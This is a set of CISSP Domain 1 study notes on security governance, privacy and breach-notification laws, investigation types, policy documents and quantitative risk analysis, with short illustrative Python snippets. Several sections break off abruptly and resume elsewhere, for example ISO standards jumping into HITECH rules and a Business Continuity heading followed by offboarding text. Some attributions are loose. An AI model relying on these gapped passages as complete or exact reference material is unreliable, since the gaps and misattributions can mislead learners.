2025 CISSP Domain Objectives
MD 2025-06-11
Security governance should address every aspect of an org, including organizational processes such as
acquisitions, divestitures, and governance committees
Be aware of the risks in acquisitions (since the state of the IT environment to be integrated is unknown,
due diligence is key) and divestitures (how to split the IT infrastructure and what to do with identities and
credentials)
Understand the value of governance committees (vendor governance, project governance, architecture
governance, etc.)
Executives, managers, and appointed individuals meet to review architecture, projects, and incidents
(security or otherwise), and provide approvals for new strategies or directions
The goal is a fresh set of eyes, often eyes that are not purely focused on information security
When evaluating a third party for your security integration, consider the following:
on-site assessment
document exchange and review
process/policy review
third-party audit
1.3.3 Organizational Roles and Responsibilities
Primary security roles are senior manager, security professional, asset owner, custodian, user, and auditor
Senior Manager: ultimately responsible for organizational security, as well as maximizing profits and
shareholder value
Security Professional: has the functional responsibility for security, including writing the security policy
and implementing it
Asset Owner: responsible for classifying information for placement or protection within the security
solution
Custodian: responsible for the task of implementing the prescribed protection defined by the security
policy and senior management
User: any person who has access to the secured system; responsible for understanding and upholding
the security policy and operating within defined security parameters
Auditor: responsible for reviewing and verifying that the security policy is properly implemented
1.3.4 Security control frameworks (e.g. International Organization for Standardization (ISO), National Institute of
Standards and Technology (NIST), Control Objectives for Information and Related Technology (COBIT),
Sherwood Applied Business Security Architecture (SABSA), Payment Card Industry (PCI), Federal Risk and
Authorization Management Program (FedRAMP))
A security control framework (AKA security framework) outlines the org's approach to security,
including guidelines, standards, and controls; a security framework is important in planning the structure
of an org's security solution; frameworks include:
International Organization for Standardization (ISO): a non-governmental org composed of
standards bodies from over 160 countries that brings global experts together to agree on best
practices across a range of industries, with six main products: International Standards, Technical
Reports, Technical Specifications, Publicly Available Specifications, Technical Corrigenda, and
Guides; ISO standards are widely used
ISO/IEC 27001: a widely recognized international standard for information security
management systems (ISMS); it provides a risk-based approach, and emphasizes continual
improvement of the ISMS
ISO 27000 series (27000, 27001, 27002, etc.) is the international security standard for
implementing organizational security and includes:
ISO 27000:2018: provides an overview of information security
management systems (ISMS)
ISO 27001:2022: provides best practice recommendations for an Information
Security Management System (ISMS)
Under the HITECH Breach Notification Rule, HIPAA-covered entities that experience a data
breach must notify affected individuals, the Secretary of Health and Human Services (HHS),
and the media of the breach within 60 days of discovery when more than 500 individuals are
affected
GLBA (Gramm-Leach-Bliley Act) applies to insurance and financial orgs, requiring notification to
federal regulators, law enforcement agencies and customers when a data breach occurs
Certain states also impose their own requirements concerning data breaches
the EU and other countries have their own requirements, for instance, the GDPR has very strict data
breach notification requirements: A data breach must be reported to the competent supervisory
authority within 72 hours of its discovery
Communications Assistance for Law Enforcement Act (CALEA): requires that all communications
carriers make wiretaps possible for law enforcement officials who have an appropriate court order
Note that some countries do not have any reporting requirements
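The notification windows above can be made concrete with a minimal Python sketch; this is illustrative only — the regime names, the window lengths as summarized in these notes, and the function name are assumptions, and real deadlines turn on legal questions (e.g. when "discovery" occurs):

```python
from datetime import datetime, timedelta

# Illustrative notification windows, as summarized in the notes above.
NOTIFICATION_WINDOWS = {
    "GDPR": timedelta(hours=72),   # report to the supervisory authority
    "HITECH": timedelta(days=60),  # notify individuals/HHS/media (>500 affected)
}

def notification_deadline(regime: str, discovered: datetime) -> datetime:
    """Return the latest permissible notification time after discovery."""
    return discovered + NOTIFICATION_WINDOWS[regime]

discovered = datetime(2025, 6, 1, 9, 0)
print(notification_deadline("GDPR", discovered))    # 2025-06-04 09:00:00
print(notification_deadline("HITECH", discovered))  # 2025-07-31 09:00:00
```

Tracking deadlines this way is a planning aid for incident response runbooks, not legal advice.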
1.4.2 Licensing and Intellectual Property requirements
Intellectual property: intangible assets (e.g. software, data)
Trademarks: words, slogans, and logos used to identify a company and its products or services
Patents: provide protection to the creators of new inventions; a temporary monopoly for producing a
specific item such as a toy, which must be novel and unique to qualify for a patent
Utility: protect the intellectual property rights of inventors
Design: cover the appearance of an invention and last for 15 years; note design patents don't
protect the idea of an invention, only its form, and are generally seen as weaker
Software: an area of ongoing controversy (e.g. Google v. Oracle); software patents have given rise to "patent trolls"
Copyright: protects original works of authorship, such as books, articles, poems, and songs; exclusive
use of artistic, musical or literary works which prevents unauthorized duplication, distribution or
modification
Licensing: a contract between the software producer and the consumer which limits the use and/or
distribution of the software
Trade Secrets: trade secret laws protect the operating secrets of a firm; trade secrets are intellectual
property that is critical to a business, and significant damage would result if it were disclosed to
competitors or the public; the Economic Espionage Act imposes fines and jail sentences on someone
found guilty of stealing trade secrets from a US corp
1.4.3 Import/export controls
Every country has laws around the import and export of hardware and software; e.g. the US has
restrictions around the export of cryptographic technology, and Russia requires a license to import
encryption technologies manufactured outside the country
International Traffic in Arms Regulations (ITAR): a US regulation controlling the manufacture, export,
and import of military or defense items (e.g. missiles, rockets, bombs, or anything else existing in the
United States Munitions List (USML))
The Export Administration Regulations (EAR): EAR predominantly focuses on commercial use-related
items like computers, lasers, marine items, and more; however, it can also include items that may have
been designed for commercial use but actually have military applications
1.4.4 Transborder data flow
Orgs should adhere to origin country-specific laws and regulations, regardless of where data resides; also
be aware of applicable laws where data is stored and systems are used
Wassenaar Arrangement: multinational agreement, voluntary export control
1.4.5 Issues related to privacy (e.g., General Data Protection Regulation (GDPR), California Consumer Privacy
Act, Personal Information Protection Law, Protection of Personal Information Act)
Be familiar with the requirements around healthcare data, credit card data and other PII data as it relates
to various countries and their laws and regulations
California SB 1386 (2002): requires immediate disclosure to individuals when a breach of their PII occurs
California Consumer Privacy Act (CCPA): The CCPA applies to:
For-profit businesses that collect consumersʼ personal information (or have others collect personal
information for them)
Determine why and how the information will be processed
Do business in California and meet any of the following:
have a gross annual revenue > $25 million;
buy, sell, or share the personal information of 100k or more California residents or
households; or
get 50% or more of their annual revenue from selling or sharing California residentsʼ personal
information
The CCPA imposes separate obligations on service providers and contractors (who contract with
businesses to process personal info) and other recipients of personal information from businesses
The CCPA does not generally apply to nonprofit orgs or government agencies
California residents have the right to:
(L)imit use and disclosure of personal info
(O)pt-out of sale or cross-context advertising
(C)orrect inaccurate info
(K)now what personal info businesses have and share
(E)qual treatment / nondiscrimination
(D)elete info businesses have on them
See the National Conference of State Legislatures (NCSL) list of state-based data breach
notifications
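The CCPA applicability thresholds above can be expressed as a simple predicate; this is an illustrative sketch — the function and parameter names are invented, and a real applicability determination requires legal review:

```python
# Hypothetical sketch of the CCPA applicability test summarized above.
def ccpa_applies(for_profit: bool, annual_revenue: float,
                 ca_residents_data: int, pct_revenue_from_selling: float) -> bool:
    """True if a for-profit business doing business in California
    meets any one of the three CCPA thresholds."""
    if not for_profit:
        return False  # nonprofits and government agencies are generally exempt
    return (annual_revenue > 25_000_000            # gross annual revenue > $25M
            or ca_residents_data >= 100_000        # data on 100k+ CA residents/households
            or pct_revenue_from_selling >= 0.50)   # 50%+ revenue from selling/sharing

print(ccpa_applies(True, 30_000_000, 5_000, 0.10))  # True (revenue threshold met)
print(ccpa_applies(True, 1_000_000, 5_000, 0.10))   # False (no threshold met)
```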
Children's Online Privacy Protection Act (COPPA) of 1998:
COPPA makes a series of demands on websites that cater to children or knowingly collect
information from children:
Websites must have a privacy notice that clearly states the types of info they collect and
what it's used for (including whether info is disclosed to third parties); must also include
contact info for site operators
Parents must be able to review any info collected from children and permanently delete it
from the site's records
Parents must give verifiable consent to the collection of info about children younger than the
age of 13 prior to any such collection
Clarifying Lawful Overseas Use of Data (CLOUD) Act: allows law enforcement to gather digital
evidence from US companies regardless of where the data is stored
US government can make bilateral agreements with other countries to provide reciprocal rights
US-based companies must comply with lawful orders for data disclosure from foreign governments
Companies are provided a mechanism to challenge data requests
Electronic Communication Privacy Act (ECPA): as amended, protects wire, oral, and electronic
communications while those communications are being made, are in transit, and when they are stored on
computers; makes it a crime to invade electronic privacy of an individual, and it broadened the Federal
Wiretap Act
Economic Espionage Act of 1996: the EEA was enacted to address the threat of trade secret theft,
misappropriation, or economic espionage by foreign entities, changing the definition of theft so it was no
longer restricted by physical constraints
Family Educational Rights and Privacy Act (FERPA): grants privacy rights to students over 18, and the
parents of minor students
Fourth Amendment to the US Constitution: the right of the people to be secure in their persons,
houses, papers, and effects against unreasonable search and seizure
General Data Protection Regulation (GDPR): replaced Data Protection Directive (DPD), purpose is to
provide a single, harmonized law that covers data throughout the EU
Key aspects:
Lawfulness, fairness, and transparency
Purpose Limitation
Data Minimization
Accuracy
Storage Limitation
Security
Accountability
GDPR's privacy rules apply to any org anywhere that stores or processes the personal data of EU
residents; these individuals must be told how their data is collected and used, and they must be
able to opt out
Be familiar with the EU Data Protection Directive (Directive 95/46/EC, which was superseded by
GDPR)
GLBA: see above
HIPAA: (see above) note that HITECH updated many of HIPAA's privacy and security requirements,
including requiring a written contract between a HIPAA-covered entity and their business associates (e.g.
orgs that handle PHI on their behalf)
HITECH: (see above) note that notification is required by HIPAA-covered entities within 60 days of
discovery when more than 500 individuals are affected
Organization for Economic Co-operation and Development (OECD): 8 best practices privacy
principles: collection limitation, data quality, purpose specification, use limitation, security safeguards,
openness, individual participation, and accountability; require orgs to avoid unjustified obstacles to trans-
border data flow, set limits to personal data collection, protect personal data with reasonable security and
more
Privacy Act of 1974: a US federal law designed to protect individuals' personal information held by
federal government agencies; it mandates that agencies keep only records necessary for conducting their
business, and provides procedures for people to access government-maintained records
Personal Information Protection and Electronic Documents Act (PIPEDA): Canadian law that governs
the use of personal information
Personal Information Protection Law (PIPL): comprehensive Chinese data privacy law, with similarities
to GDPR
Key aspects of PIPL:
Consent and purpose: explicit consent is required for data aggregation and processing, and
individuals can withdraw consent
Minimum Data Collection: PIPL requires orgs to collect only relevant and necessary
personal data
Data Subject Rights: provides people with rights to access, correction, deletion, and to be
informed of data breaches
Cross-Border Data Transfer: imposes restrictions on transferring personal data outside of
China
Privacy Shield (successor to the EU-US Safe Harbor agreement): controlled data flow from the EU to the
United States; the EU has more stringent privacy protections, and without such an agreement, personal
data flow from the EU to the United States would not be allowed; note that Privacy Shield was invalidated
in 2020 (Schrems II) and succeeded by the EU-US Data Privacy Framework
Protection of Personal Information Act (POPIA): South Africa's comprehensive data protection law
designed to protect personal information processed by public and private entities, and promote the
right to privacy
Key provisions of POPIA:
Applies to any organization processing PII of natural or juristic persons in SA
Eight conditions for lawful processing
accountability
processing limitation (minimality and consent)
purpose specification
information quality
openness
security safeguards
data subject participation
limitation on further processing
Consent required from the data subject to process data, or from a parent or guardian if the
subject is a child
Strict conditions on special personal information (race, religion, trade union membership,
political affiliation, etc.)
Restricts cross-border information transfers unless the recipient country has similar privacy
protections
Penalties for POPIA violation can be severe, enforced by the Information Regulator
US Patriot Act of 2001: enacted following the September 11 attacks with the stated goal of tightening
U.S. national security, particularly as it related to foreign terrorism
The act included three main provisions:
expanded surveillance abilities of law enforcement, including by tapping domestic and
international phones
easier interagency communication to allow federal agencies to more effectively use all
available resources in counter-terrorism efforts, allowing government to obtain detailed
information on user activity through a subpoena, and ISPs can voluntarily provide a large
range of information to the government
increased penalties for terrorism crimes and an expanded list of activities which would
qualify for terrorism charges
1.4.6 Contractual, legal, industry standards, and regulatory requirements
Understand the difference between criminal, civil, and administrative law.
Criminal law: protects society against acts that violate the basic principles we believe in; violations
of criminal law are prosecuted by federal and state governments
Civil law: provides the framework for the transaction of business between people and
organizations; violations of civil law are brought to the court and argued by the two affected parties
Administrative law: used by government agencies to effectively carry out their day-to-day
business
Compliance: Organizations may find themselves subject to a wide variety of laws and regulations
imposed by regulatory agencies or contractual obligations
Payment Card Industry Data Security Standard (PCI DSS) - governs the security of credit card
information and is enforced through the terms of a merchant agreement between a business that
accepts CC payments, and the bank that processes the business' transactions
Sarbanes-Oxley (SOX): governs publicly traded corps; financial systems may be audited to
ensure security controls are sufficient to ensure compliance with SOX; requires top management to
individually certify the accuracy of financial info
violations include criminal penalties
Gramm-Leach-Bliley Act (GLBA) - affects banks, insurance companies, and credit providers;
included a number of limitations on the types of information that could be exchanged even among
subsidiaries of the same corp, and required financial institutions to provide written privacy policies
to all their customers
Health Insurance Portability and Accountability Act (HIPAA) - privacy and security regulations
requiring strict security measures for hospitals, physicians, insurance companies, and other
organizations that process or store private medical information about individuals; also clearly
defines the rights of individuals who are the subject of medical records and requires organizations
that maintain such records to disclose these rights in writing
includes criminal penalties for violations
Federal Information Security Management Act (FISMA) - requires federal agencies to
implement an information security program that covers the agency's operations and contractors;
the Federal Information Security Modernization Act of 2014 amended the 2002 version of FISMA by
centralizing federal cybersecurity responsibility within the Department of Homeland Security (DHS),
except for defense-related cybersecurity (Department of Defense) and intelligence-related
cybersecurity (overseen by the Director of National Intelligence (DNI)); the Cybersecurity
Enhancement Act of 2014 charged NIST with coordination of voluntary nationwide cybersecurity
standards
Electronic Communications Privacy Act (ECPA) - in short, makes it a crime to invade the
electronic privacy of an individual; passed in 1986 to expand and revise federal wiretapping and
electronic eavesdropping provisions, making it a crime to intercept or procure electronic
communications, and includes important provisions that protect a personʼs wire and electronic
communications from being intercepted by another private individual
Digital Millennium Copyright Act (DMCA) - prohibits the circumvention of copyright protection
mechanisms placed in digital media and limits the liability of internet service providers for the
activities of their users
1.5 Understand requirements for investigation types (i.e., administrative, criminal, civil,
regulatory, industry standards) (OSG-10 Chpt 19)
An investigation will vary based on incident type; e.g. for a financial services company, a financial system
compromise might cause a regulatory investigation; a system breach or website compromise might cause a
criminal investigation; each type of investigation has special considerations:
Administrative: internal investigations usually review operational issues or violations of an organization's
policies; often tied to HR scenarios, an admin investigation could be part of technical troubleshooting;
since these investigations are for internal purposes, they usually have the lowest formality and standards
in terms of documentation or procedures compared to other types; admin investigations often focus on
finding the root cause of operational issues
Criminal: a criminal investigation occurs when a crime has been committed and you are working with a
law enforcement agency to convict the alleged perpetrator; in such a case, it is common to gather
evidence for a court of law, and to share the evidence with the defense
You need to gather and handle the information using methods that ensure the evidence can be
used in court
In a criminal case, a suspect must be proven guilty beyond a reasonable doubt; a higher bar
compared to a civil case, which is showing a preponderance of evidence
Civil: in a civil case, one person or entity sues another, e.g. one company could sue another for a
trademark violation
A civil case is typically about monetary damages, and doesn't involve criminality
In a civil case, a preponderance of evidence is required to secure a victory, differing from criminal
cases, where a suspect is innocent until proven guilty beyond a reasonable doubt; evidence
collection standards for civil investigations are usually lower than for criminal cases
Industry Standards: an industry standards investigation is intended to determine whether an org is
adhering to a specific industry standard or set of standards, such as those associated with PCI DSS;
because standards are not laws, these investigations can be related to contractual compliance, and an
org may be required to participate in audits or assessments
Because industry standards represent well-understood and widely implemented best practices,
many orgs try to adhere to them even when they are not required to do so in order to improve
security, and reduce operational and other risks
Regulatory: A regulatory investigation is conducted by a regulatory body, such as the Securities and
Exchange Commission (SEC) or Financial Industry Regulatory Authority (FINRA), against an org suspected
of an infraction
Here the org is required to comply with the investigation, e.g., by not hiding or destroying evidence
1.6 Develop, document, and implement security policy, standards, procedures and
guidelines (OSG-10 Chpt 1)
To create a comprehensive security plan, you need the following items: security policy, standards, baselines,
guidelines, and procedures
The top tier of a formalized hierarchical organization security documentation is the security policy
Policy: docs created and published by senior management describing organizational strategic goals
A security policy is a document that defines the scope of security needed by the org, discussing assets
that require protection and the extent to which security solutions should go to provide the necessary
protections
It defines the strategic security objectives, vision, and goals and outlines the security framework of the
organization
Acceptable Use Policy: the AUP is a commonly produced document that exists as part of the overall security
documentation infrastructure
This policy defines a level of acceptable performance and expectation of behavior and activity; failure to
comply with the policy may result in job action warnings, penalties, or termination
Security Standards, Baselines and Guidelines: once the main security policies are set, the remaining security
documentation can be crafted from these policies
Policies: these are high-level documents, usually written by the management team; policies are
mandatory, and a policy might provide requirements, but not the steps for implementation
Standards: specific mandates explicitly stating expectations of performance/conformance; more
descriptive than policies, standards define compulsory requirements for the homogenous use of
hardware, software, technology, and security controls, uniformly implemented throughout the org
Baseline: defines a minimum level of security that every system throughout the organization must meet;
baselines are usually system specific and refer to industry / government standards
e.g. a baseline for server builds would be a list of configuration areas that should be applied to
every server that is built
A Group Policy Object (GPO) in a Windows network is sometimes used to comply with standards;
configuration management solutions can also help you establish baselines and spot configurations
that are not in alignment
Guideline: offers recommendations on how standards and baselines should be implemented & serves as
an operational guide for security professionals and users
Guidelines are flexible, and can be customized for unique systems or conditions; they state which
security mechanism should be deployed instead of prescribing a specific product or control; they
are not compulsory; suggested practices and expectations of activity to best accomplish tasks and
goals
Procedure (AKA Standard Operating Procedure or SOP): detailed, step-by-step how-to doc that
describes the exact actions necessary to implement a specific security mechanism, control, or solution
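As a sketch of how a baseline might be checked in practice — the kind of comparison a GPO report or configuration management solution performs — here is a minimal Python example; the setting names and values are invented, not from any real standard:

```python
# Illustrative baseline: the minimum configuration every server must meet.
# Setting names and values here are hypothetical.
BASELINE = {
    "password_min_length": 14,
    "firewall_enabled": True,
    "remote_root_login": False,
}

def baseline_deviations(actual: dict) -> dict:
    """Return settings that differ from the baseline; a missing
    setting counts as a deviation (reported with value None)."""
    return {k: actual.get(k) for k, v in BASELINE.items() if actual.get(k) != v}

# A server missing one setting and misconfiguring another:
server = {"password_min_length": 8, "firewall_enabled": True}
print(baseline_deviations(server))
# {'password_min_length': 8, 'remote_root_login': None}
```

A report of deviations like this is how configuration management tooling spots systems out of alignment with the baseline.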
1.7 Identify, analyze, assess, prioritize, and implement Business Continuity (BC)
requirements (OSG-10 Chpt 3)
Termination or offboarding: offboarding is the removal of an employee's identity from the IAM system,
once that person has left the org; can also be an element used when an employee transfers into a new
role
whether cordial or abrupt, the ex-employee should be escorted off the premises and not allowed to
return
1.8.4 Vendor, consultant, and contractor agreements and controls
Orgs commonly outsource many IT functions, particularly data center hosting, contact-center support,
and application development
Info security policies and procedures must address outsourcing security and the use of service providers,
vendors and consultants
e.g. access control, document exchange and review, maintenance, on-site assessment, process
and policy review, and Service Level Agreements (SLAs) are examples of outsourcing security
considerations
1.9 Understand and apply risk management concepts (OSG-10 Chpt 2)
1.9.1 Threat and vulnerability identification
Risk Management: process of identifying factors that could damage or disclose data, evaluating those
factors in light of data value and countermeasure cost, and implementing cost-effective solutions for
mitigating or reducing risk
Threats: any potential occurrence that may cause an undesirable or unwanted outcome for a specific
asset; they can be intentional or accidental; loosely think of a threat as a weapon that could cause harm
to a target
Vulnerability: the weakness in an asset, or weakness (or absence) of a safeguard or countermeasure; a
flaw, limitation, error, frailty, or susceptibility to harm
Threats and vulnerabilities are related: a threat is possible when a vulnerability is present
Threats exploit vulnerabilities, which results in exposure
Exposure is risk, and risk is mitigated by safeguards
Safeguards protect assets that are endangered by threats
Threat Agent/Actors: intentionally exploit vulnerabilities
Threat Events: accidental occurrences and intentional exploitations of vulnerabilities
Threat Vectors (AKA attack vectors): the path or means by which an attack or attacker can gain
access to a target in order to cause harm
Exposure: being susceptible to asset loss because of a threat; the potential for harm to occur
Exposure Factor (EF): derived from this concept; an element of quantitative risk analysis that
represents the percentage of loss that an org would experience if a specific asset were violated by
a realized risk; e.g. an EF of 0.2 (or 20%) for a specific threat indicates that a realization of that
threat would result in a loss of 20% of the asset's value
Single Loss Expectancy (SLE): an element of quantitative risk analysis that represents the cost
associated with a single realized risk against a specific asset; SLE = asset value (AV) * exposure
factor (EF)
Annualized rate of occurrence (ARO): an element of quantitative risk analysis that represents the
expected frequency with which a specific threat or risk will occur within a single year
Annualized loss expectancy (ALE): an element of quantitative risk analysis that represents the
possible yearly cost of all instances of a specific realized threat against a specific asset; ALE = SLE
* ARO
Safeguard evaluation: the value of a safeguard is the ALE before the safeguard minus the ALE
with the safeguard, minus the annual cost of the safeguard (ACS): (ALE1 - ALE2) - ACS
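The quantitative formulas above (SLE, ALE, and safeguard value) can be illustrated with a small worked example; all figures here are invented:

```python
# Worked example of the quantitative risk formulas; all numbers are invented.
asset_value = 100_000             # AV: value of the asset ($)
exposure_factor = 0.20            # EF: 20% of the asset lost per incident
aro_before = 0.5                  # ARO: one incident expected every two years
aro_with_safeguard = 0.1          # ARO after the safeguard is in place
annual_cost_of_safeguard = 3_000  # ACS

sle = asset_value * exposure_factor    # SLE = AV * EF = 20,000
ale_before = sle * aro_before          # ALE1 = SLE * ARO = 10,000
ale_after = sle * aro_with_safeguard   # ALE2 = 2,000
safeguard_value = (ale_before - ale_after) - annual_cost_of_safeguard  # 5,000
print(sle, ale_before, ale_after, safeguard_value)
```

A positive safeguard value (here $5,000/year) suggests the safeguard is cost-justified; a negative value suggests accepting the risk may be cheaper.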
Risk: the possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset
and the severity of damage that could result; the greater the potential harm, the greater the risk
1.9.2 Risk analysis, assessment, and scope
Risk Assessment: used to identify the risks and set criticality priorities, and then risk response is used to
determine the best defense for each identified risk
Risk is threat with a vulnerability
Risk = threat * vulnerability (or probability of harm multiplied by severity of harm)
Addressing either the threat or threat agent or vulnerability directly results in a reduction of risk (known as
threat mitigation)
All IT systems have risk; all orgs have risk; there is no way to eliminate 100% of all risks
Instead upper management must decide which risks are acceptable, and which are not; there are
two primary risk-assessment methodologies:
Quantitative Risk Analysis: assigns real dollar figures to the loss of an asset and is based
on mathematical calculations
Qualitative Risk Analysis: assigns subjective and intangible values to the loss of an asset
and takes into account perspectives, feelings, intuition, preferences, ideas, and gut
reactions; qualitative risk analysis is based more on scenarios than calculations, and threats
are ranked to evaluate risks, costs, and effects
Most orgs employ a hybrid of both risk assessment methodologies
The goal of risk assessment is to identify risks (based on asset-threat pairings) and rank them in
order of criticality
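A qualitative ranking can be sketched as a simple risk matrix, scoring each asset-threat pairing by likelihood and impact; the 1-5 scale and the example pairings below are invented for illustration:

```python
# Hypothetical qualitative risk matrix: (asset-threat pairing, likelihood, impact),
# each scored subjectively on a 1-5 scale (an assumed convention).
risks = [
    ("web server / DDoS", 4, 3),
    ("database / SQL injection", 3, 5),
    ("laptop fleet / theft", 2, 2),
]

# Rank by likelihood * impact, highest criticality first.
ranked = sorted(risks, key=lambda r: r[1] * r[2], reverse=True)
for name, likelihood, impact in ranked:
    print(f"{name}: score {likelihood * impact}")
# database / SQL injection: score 15
# web server / DDoS: score 12
# laptop fleet / theft: score 4
```

The scores are subjective, which is the point of qualitative analysis: the ranking, not the absolute numbers, drives which risks get addressed first.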
1.9.3 Risk response and treatment (e.g. cybersecurity insurance)
Risk response: the formulation of a plan for each identified risk; for a given risk, you have a choice for a
possible risk response:
Risk Mitigation: reducing risk, or risk mitigation, is the implementation of safeguards, security
controls, and countermeasures to reduce and/or eliminate vulnerabilities or block threats
Risk Assignment: assigning or transferring risk is the placement of the responsibility of loss due to
a risk onto another entity or organization; AKA assignment of risk and transference of risk
Risk Deterrence: deterrence is the process of implementing deterrents for would-be violators of
security and policy
the goal is to convince a threat agent not to attack
e.g. implementing auditing, security cameras, and warning banners; using security guards
Risk Avoidance: determining that the impact or likelihood of a specific risk is too great to be offset
by potential benefits, and not performing a particular business function due to that determination;
the process of selecting alternate options or activities that have less associated risk than the
default, common, expedient, or cheap option
Risk Acceptance: the result after a cost/benefit analysis determines that countermeasure costs
would outweigh the possible cost of loss due to a risk
also means that management has agreed to accept the consequences/loss if the risk is
realized
Risk Rejection: an unacceptable possible response to risk is to reject or ignore risk; denying
that risk exists and hoping that it will never be realized are not valid or prudent due care/due
diligence responses to risk
Risk Transference: paying an external party (i.e. an insurance company) to accept the financial
impact of a given risk
Inherent Risk: the level of natural, native, or default risk that exists in an environment, system, or product
prior to any risk management efforts being performed (AKA initial or starting risk); this is the risk
identified by the risk assessment process
Residual Risk: consists of threats to specific assets against which management chooses not to
implement a safeguard (the risk that management has chosen to accept rather than mitigate); the
risk remaining after security controls have been put in place
Total Risk: the amount of risk an org would face if no safeguards were implemented
Conceptual Total Risk Formula: threats x vulnerabilities x asset value = total risk
Controls Gap: amount of risk that is reduced by implementing safeguards, or the difference between
total risk and residual risk
Conceptual Residual Risk Formula: total risk - controls gap = residual risk
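The conceptual formulas above can be illustrated with hypothetical numbers (the values and the 75% reduction are made up for illustration):

```python
# Conceptual (not literal) risk formulas from the notes, with hypothetical values.
threats = 4              # relevant threats (illustrative scale)
vulnerabilities = 3      # exploitable weaknesses (illustrative scale)
asset_value = 10_000     # asset value in dollars (hypothetical)

# total risk = threats x vulnerabilities x asset value
total_risk = threats * vulnerabilities * asset_value

# Suppose safeguards eliminate 75% of that exposure (hypothetical controls gap).
controls_gap = 0.75 * total_risk

# residual risk = total risk - controls gap
residual_risk = total_risk - controls_gap

print(total_risk, controls_gap, residual_risk)  # 120000 90000.0 30000.0
```

The formulas are conceptual: they convey that safeguards close part of the total risk and that whatever remains is accepted as residual risk.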
Risk should be reassessed on a periodic basis to maintain reasonable security because security changes
over time
Countermeasure: AKA a "control" or "safeguard" can help reduce risk
For exam prep, understand how the concepts are integrated into your environment; this is not a
step-by-step technical configuration, but the process of the implementation — where you start, in
which order it occurs and how you finish
Bear in mind that security should be designed to support and enable business tasks and functions
security controls, countermeasures, and safeguards can be implemented administratively,
logically / technically, or physically
these 3 categories should be implemented in a conceptual layered defense-in-depth manner
to provide maximum benefit
based on the concept that policies (part of administrative controls) drive all aspects of
security and thus form the initial protection layer around assets
then, logical and technical controls provide protection against logical attacks and exploits
then, physical controls provide protection against real-world physical attacks against
facilities and devices
1.9.4 Applicable types of controls (e.g., preventive, detection, corrective)
Three ways to implement mitigating controls:
Administrative: the policies and procedures defined by an org's security policy and other
regulations or requirements
Technical / Logical: examples include firewalls, automated backups, encryption
Physical: security mechanisms focused on providing protection to the facility and real world
objects
Safeguards:
Preventive: a preventive or preventative control is deployed to thwart or stop unwanted or
unauthorized activity from occurring
Deterrent: a deterrent control is deployed to discourage security policy violations; deterrent and
preventative controls are similar, but deterrent controls often depend on individuals being
convinced not to take an unwanted action
Directive: A directive control is deployed to direct, confine, or control the actions of subjects to
force or encourage compliance with security policies
Countermeasures:
Detective: a detective control is deployed to discover or detect unwanted or unauthorized activity;
detective controls operate after the fact
Corrective: a corrective control modifies the environment to return systems to normal after an
unwanted or unauthorized activity has occurred; it attempts to correct any problems resulting from a
security incident
Recovery: an extension of corrective controls, but with more advanced or complex abilities; a
recovery control attempts to repair or restore resources, functions, and capabilities after a security
policy violation
recovery controls typically address more significantly damaging events than corrective
controls, especially when security violations may have occurred
Compensating: a compensating control is deployed to provide various options to other existing
controls, to aid in enforcement and support of security policies
they can be any controls used in addition to, or in place of, another control
they can be a means to improve the effectiveness of a primary control or as the alternative or
failover option in the event of a primary control failure
1.9.5 Control assessments (e.g. security and privacy)
Security control assessment (SCA): formal evaluation and review of individual controls against a
baseline
The goal of an SCA is to ensure security mechanism effectiveness; periodically assess security and
privacy controls to determine whatʼs working and what isnʼt
As part of this assessment, the existing documents should be thoroughly reviewed, and some of
the controls tested randomly
A report is typically produced to show the outcomes and enable the org to remediate deficiencies
Often, security and privacy control assessments are performed and/or validated by different teams,
with the privacy team handling the privacy aspects
For federal agencies, an SCA process generally is based on SP 800-53
1.9.6 Continuous monitoring and measurement
Monitoring and measurement are closely aligned with identifying risks
While monitoring is used for more than security purposes, monitoring should be tuned to ensure the org
is notified about potential security incidents as soon as possible
If a security breach occurs, monitored systems and data become valuable from a forensics perspective;
from the ability to derive root cause of an incident to making adjustments to minimize the chances of
reoccurrence
1.9.7 Reporting (e.g., internal, external)
Risk Reporting is a key task to perform at the conclusion of risk analysis (i.e. production and presentation
of a summarizing report)
A Risk Register or Risk Log is a document that inventories all identified risks to an org or system or within
an individual project
A risk register is used to record and track the activities of risk management, including:
identifying risks
evaluating the severity of, and prioritizing those risks
prescribing responses to reduce or eliminate the risks
tracking the progress of risk mitigation
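A risk register like the one described above can be modeled minimally as follows (the field names and the 1-5 scoring scale are illustrative assumptions, not a prescribed format):

```python
from dataclasses import dataclass

@dataclass
class RiskEntry:
    """One row in a hypothetical risk register/log."""
    risk_id: str
    description: str
    likelihood: int       # 1 (rare) to 5 (almost certain), illustrative scale
    impact: int           # 1 (negligible) to 5 (severe), illustrative scale
    response: str = ""    # prescribed response (mitigate, transfer, accept, avoid)
    status: str = "open"  # tracks progress of risk mitigation

    @property
    def severity(self) -> int:
        # Simple likelihood x impact score used for prioritization
        return self.likelihood * self.impact

register = [
    RiskEntry("R-001", "Unpatched VPN appliance", 4, 5, "mitigate"),
    RiskEntry("R-002", "Vendor data-center flood", 1, 4, "transfer"),
]

# Prioritize: highest severity first
for r in sorted(register, key=lambda r: r.severity, reverse=True):
    print(r.risk_id, r.severity)
```

In practice a register also records owners, dates, and review history; the point here is only that it is a living inventory used to rank and track risks.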
1.9.8 Continuous improvement (e.g., risk maturity modeling)
Risk analysis is performed to provide upper management with the details necessary to decide which risks
should be mitigated, which should be transferred, which should be deterred, which should be avoided,
and which should be accepted; to fully evaluate risks and subsequently take proper precautions, the
following must be analyzed:
assets
asset valuation
threats
vulnerabilities
exposure
risk
realized risk
safeguards
countermeasures
attacks
breaches
An Enterprise Risk Management (ERM) program can be evaluated using an RMM
Risk Maturity Model (RMM): assesses the key indicators and activities of a mature, sustainable, and
repeatable risk management process, typically relating the assessment of risk maturity against a five-
level model such as:
Ad hoc: a chaotic starting point from which all orgs initiate risk management
Preliminary: loose attempts are made to follow risk management processes, but each department
may perform risk assessment uniquely
Defined: a common or standardized risk framework is adopted organization-wide
Integrated: risk management operations are integrated into business processes, metrics are used
to gather effectiveness data, and risk is considered an element in business strategy decisions
Optimized: risk management focuses on achieving objectives rather than just reacting to external
threats; increased strategic planning is geared toward business success rather than just avoiding
incidents; and lessons learned are re-integrated into the risk management process
1.9.9 Risk frameworks (e.g., International Organization for Standardization (ISO), National Institute of Standards
and Technology (NIST), Control Objectives for Information and Related Technology (COBIT), Sherwood Applied
Business Security Architecture (SABSA), Payment Card Industry (PCI))
See section 1.3.4 above for definitions of these frameworks
A risk framework is a guide or recipe for how risk is to be assessed, resolved, and monitored
NIST established the Risk Management Framework (RMF) and the Cybersecurity Framework (CSF):
